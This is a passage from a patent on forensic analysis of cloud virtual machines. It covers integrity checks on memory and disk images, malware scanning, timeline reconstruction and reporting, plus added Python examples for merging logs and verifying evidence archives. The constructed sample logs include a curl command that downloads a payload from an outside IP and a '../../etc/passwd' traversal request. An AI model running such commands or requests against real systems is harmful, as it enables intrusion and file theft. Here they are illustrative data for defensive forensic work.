The specific method of step S2-2 is: verify the virtual disk file of the target virtual machine: compute the MD5 hash value of the file and compare it with the MD5 value in the JSON file contained in the compressed status information file of the target virtual machine; if the two agree, proceed to the next analysis step; if they do not agree, copy a fresh copy for forensic analysis from the database within the agency until the two MD5 values agree. Determine the disk image format corresponding to the virtual disk file and write it into the variable IMGtype; use IMGtype to retrieve from the database within the agency the disk forensic analysis tool suited to that disk image format. According to the file format of the disk and using the disk forensic analysis tool, parse the information contained in the virtual disk file, mainly the user list, the file directories and the log information, and export the parsed information into formatted files. For the file system, scan the disk with virus and trojan detection tools to determine whether the target virtual machine has been infected by a virus or implanted with a trojan, and at the same time analyze the network behaviour of the target virtual machine to detect abnormal behaviour. For the log information, once a virus, trojan or abnormal network behaviour has been detected, the events caused by the malicious program are reconstructed along a timeline.
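The timeline reconstruction at the end of step S2-2 only works if artefacts from different sources are first normalised to one clock. The following block is an added example, not the patent's own code. It assumes the disk forensic tool has exported a few artefacts from the restored disk image (syslog lines without a year, a web-server access log stamped in a local offset, and file-system metadata for a file flagged by the scanner), all constructed here, and shows how they are merged into one UTC timeline and cut down to the window around the scanner's hit. The year for the syslog lines would in practice come from the freeze timestamp recorded in step S1-2.

```python
import re
from datetime import datetime, timedelta, timezone

YEAR = 2024  # syslog lines carry no year; taken from the freeze timestamp in practice

# Constructed sample artefacts exported from the restored disk image.
SYSLOG = """\
Jan  1 00:03:55 vm42 sshd[811]: Accepted password for root from 198.51.100.7 port 51022 ssh2
Jan  1 00:04:02 vm42 sudo:     root : TTY=pts/0 ; PWD=/root ; COMMAND=/usr/bin/curl -o /tmp/.x http://198.51.100.7/x
Jan  1 00:04:05 vm42 systemd[1]: Started Session 3 of user root.
Jan  1 00:04:10 vm42 kernel: [  920.1] x: module verification failed
Jan  1 00:09:00 vm42 CRON[1001]: (root) CMD (run-parts /etc/cron.hourly)
"""
ACCESS = """\
203.0.113.9 - - [01/Jan/2024:08:03:20 +0800] "GET /upload.php?f=../../etc/passwd HTTP/1.1" 200 1203
203.0.113.9 - - [01/Jan/2024:08:03:41 +0800] "POST /upload.php HTTP/1.1" 200 48
"""
FLAGGED_FILES = [  # file-system metadata for the scanner's hit
    {"path": "/tmp/.x", "mtime": "2024-01-01T00:04:04Z", "verdict": "Linux/Rootkit.A"},
]

SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d+) (\d\d:\d\d:\d\d) (\S+) (.*)$")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')


def parse_syslog(text, year=YEAR):
    """Classic syslog: no year, no zone; the host clock is taken to be UTC here."""
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        mon, day, hms, _host, msg = m.groups()
        ts = datetime.strptime(f"{year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S")
        yield ts.replace(tzinfo=timezone.utc), "syslog", msg


def parse_access(text):
    """Common log format carries its own offset, so it can be converted exactly."""
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, when, req, status = m.groups()
        ts = datetime.strptime(when, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        yield ts, "access", f"{ip} {req} -> {status}"


def parse_files(entries):
    for e in entries:
        ts = datetime.fromisoformat(e["mtime"].replace("Z", "+00:00"))
        yield ts, "fs", f"{e['path']} written ({e['verdict']})"


def build_timeline(syslog=SYSLOG, access=ACCESS, files=FLAGGED_FILES):
    """All sources merged into one list of (utc time, source, message), oldest first."""
    events = list(parse_syslog(syslog)) + list(parse_access(access)) + list(parse_files(files))
    return sorted(events, key=lambda e: e[0])


def events_around(timeline, anchor_source="fs", window=timedelta(minutes=2)):
    """Keep only events within +/- window of the first anchor event (the scanner's hit)."""
    anchors = [e[0] for e in timeline if e[1] == anchor_source]
    if not anchors:
        return []
    t0 = anchors[0]
    return [e for e in timeline if abs(e[0] - t0) <= window]


def render(events):
    return [f"{t.strftime('%Y-%m-%dT%H:%M:%SZ')} {src:6} {msg}" for t, src, msg in events]


if __name__ == "__main__":
    print("\n".join(render(events_around(build_timeline()))))
```

On the constructed data the merged view shows the upload requests (logged at 08:03 local time) preceding the SSH login and the download of /tmp/.x, an order that is invisible while each log is read in its own time zone.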
Step S2-2 specifically comprises:
S2-2-1. transmit the status information file of the target virtual machine;
S2-2-2. judge whether the MD5 hash value of the compressed file agrees with the file name; if so, go to step S2-2-3, otherwise go directly to step S2-2-5;
S2-2-3. decompress, and judge whether the MD5 hash value of the memory dump file agrees with the information in the JSON file; if so, go to step S2-2-4, otherwise go directly to step S2-2-5;
S2-2-4. judge whether the MD5 hash value of the virtual disk file agrees with the information in the JSON file, and go to step S2-2-5 in either case;
S2-2-5. judge whether retransmission is needed; if so, return to step S2-2-2, otherwise end.
In step S2-2-1 the compressed status information file of the target virtual machine is transmitted to the third-party testing agency over the secure link.
In step S2-2-2, after the third-party testing agency has received the compressed file, it verifies the compressed file using the file name.
In step S2-2-3 the two files in the decompressed folder are verified separately using the information provided by the JSON file in the folder.
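The packaging procedure of steps S1-3-1 to S1-3-5 and the receiving checks of steps S2-2-2 to S2-2-4 are two halves of one protocol, so the following block implements both sides together. It is an added example, not the patent's own code. Assumptions not in the text: a gzip'd tar archive stands in for the 7z archive, the JSON file is called manifest.json, and the default digest is SHA-256 rather than MD5. MD5 still detects transmission corruption, which is all the text asks of it, but it no longer resists deliberate substitution of a file with a colliding one; the helper accepts algo="md5" to reproduce the page's naming scheme exactly. The receiver also refuses archive members with directory components, because the archive arrives from another party and must not be able to write outside the working folder. The dump and disk files are constructed.

```python
import hashlib
import io
import json
import os
import tarfile
import tempfile
from pathlib import Path

# Assumptions (not from the patent): tar.gz instead of 7z, SHA-256 instead of MD5,
# "manifest.json" for the unnamed JSON file. Pass algo="md5" to match the text.
HASH_ALGO = "sha256"
ARCHIVE_SUFFIX = ".tar.gz"
MANIFEST_NAME = "manifest.json"


def file_digest(path, algo=HASH_ALGO):
    """Hex digest of a file, streamed so a multi-GB memory dump never sits in RAM."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def package_evidence(user_id, vm_id, frozen_at, dump_path, disk_path,
                     report_email, out_dir, algo=HASH_ALGO):
    """Producer side (S1-3-1 to S1-3-5): per-file digests and the report address go
    into the manifest, everything into one archive, which is then renamed to
    '<user_id>-<digest of the archive>'. Returns the final archive path."""
    dump_path, disk_path, out_dir = Path(dump_path), Path(disk_path), Path(out_dir)
    manifest = {
        "user_id": user_id,
        "vm_id": vm_id,
        "frozen_at": frozen_at,
        "hash_algorithm": algo,
        "files": {p.name: file_digest(p, algo) for p in (dump_path, disk_path)},
        "report_email": report_email,
    }
    tmp = out_dir / f"{user_id}-pending{ARCHIVE_SUFFIX}"
    with tarfile.open(tmp, "w:gz") as tar:
        for p in (dump_path, disk_path):
            tar.add(p, arcname=p.name)
        data = json.dumps(manifest, indent=2).encode()
        info = tarfile.TarInfo(MANIFEST_NAME)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    final = out_dir / f"{user_id}-{file_digest(tmp, algo)}{ARCHIVE_SUFFIX}"
    tmp.rename(final)
    return final


def verify_evidence(archive_path, work_dir, algo=HASH_ALGO):
    """Receiver side (S2-2-2 to S2-2-4). Returns (ok, reason); ok == False is the
    signal to request retransmission in step S2-2-5."""
    archive_path, work_dir = Path(archive_path), Path(work_dir)
    if not archive_path.name.endswith(ARCHIVE_SUFFIX):
        return False, "unexpected archive type"
    expected = archive_path.name[:-len(ARCHIVE_SUFFIX)].rsplit("-", 1)[-1]
    # S2-2-2: the outer digest must match the name before anything is unpacked.
    if file_digest(archive_path, algo) != expected:
        return False, "archive digest does not match file name"
    work_dir.mkdir(parents=True, exist_ok=True)
    with tarfile.open(archive_path, "r:gz") as tar:
        # Only plain files with bare names are accepted, so nothing can land outside work_dir.
        for m in tar.getmembers():
            if not m.isfile() or m.name != Path(m.name).name:
                return False, f"unsafe archive member: {m.name}"
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(work_dir, **kwargs)
    manifest = json.loads((work_dir / MANIFEST_NAME).read_text())
    # S2-2-3 and S2-2-4: every file listed in the manifest must be present and match.
    for name, digest in manifest["files"].items():
        p = work_dir / name
        if not p.is_file():
            return False, f"missing file: {name}"
        if file_digest(p, algo) != digest:
            return False, f"digest mismatch: {name}"
    return True, "complete and correct"


def demo():
    """Round trip on constructed files, then the same archive with one flipped byte."""
    with tempfile.TemporaryDirectory() as d:
        d = Path(d)
        dump, disk = d / "vm-42.mem", d / "vm-42.qcow2"
        dump.write_bytes(b"\x00" * 4096 + b"MZ" + os.urandom(256))  # constructed
        disk.write_bytes(b"QFI\xfb" + os.urandom(1024))            # constructed
        archive = package_evidence("user-17", "vm-42", "2024-01-01T00:00:00Z",
                                   dump, disk, "user@example.invalid", d)
        clean = verify_evidence(archive, d / "clean")
        data = bytearray(archive.read_bytes())
        data[-1] ^= 0xFF  # corruption in transit: name and content no longer agree
        archive.write_bytes(data)
        tampered = verify_evidence(archive, d / "tampered")
        return {"clean": clean, "tampered": tampered}


if __name__ == "__main__":
    print(demo())
```

The file name is derived from the finished archive, so the outer check in verify_evidence needs nothing but the file itself; the manifest is only trusted after that check has passed, and the archive is never unpacked when it fails, which is exactly the ordering the text prescribes for steps S2-2-2 and S2-2-3.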
In step S3, after the anomaly of the target virtual machine has been detected, the results of the memory forensic analysis and of the disk forensic analysis are all listed in the standard format and the corresponding JSON file is generated; the examination report is returned to the cloud service provider and sent to the user's mailbox address attached in the transmitted file. The specific method is: combining the results of the memory forensic analysis and the disk forensic analysis, the problem with the target virtual machine is determined by comprehensive analysis, for example that a trojan has been implanted or the registry has been tampered with, and the above forensic results and the problem found are compiled into a forensic analysis result report in a fixed format. Feature extraction is performed on the target virtual machine in which the anomaly was detected to obtain the features produced by the particular malware, and these features are written into the agency's feature database. The generated result report is stored and backed up in the database deployed within the agency. The e-mail address at which the user receives the result is then retrieved from the transmitted status information file of the target virtual machine, and the forensic analysis result report is sent to this address; a message reporting the successful forensic analysis of the target virtual machine is then returned to the cloud service provider; finally the forensic analysis result report is deleted.
Step S3 specifically comprises:
S3-1. back up the compressed status information file of the target virtual machine that has undergone forensic analysis into the database, then delete it;
S3-2. perform memory forensic analysis on the memory dump file;
S3-3. perform disk forensic analysis on the virtual disk file;
S3-4. perform comprehensive analysis on the analysis results of steps S3-2 and S3-3 and generate the forensic analysis result report;
S3-5. feed the forensic analysis result report back to the cloud service user at the e-mail address in the JSON file;
S3-6. back up the forensic analysis result report into the database, then delete it.
The raw data and forensic analysis result database is built using steps S3-1 and S3-4.
The above is only a preferred embodiment of the present invention and is not intended to limit the invention; those skilled in the art may modify and vary the present invention in many ways. Any modification, equivalent replacement, improvement and the like made within the spirit and principle of the present invention shall fall within the scope of protection of the present invention.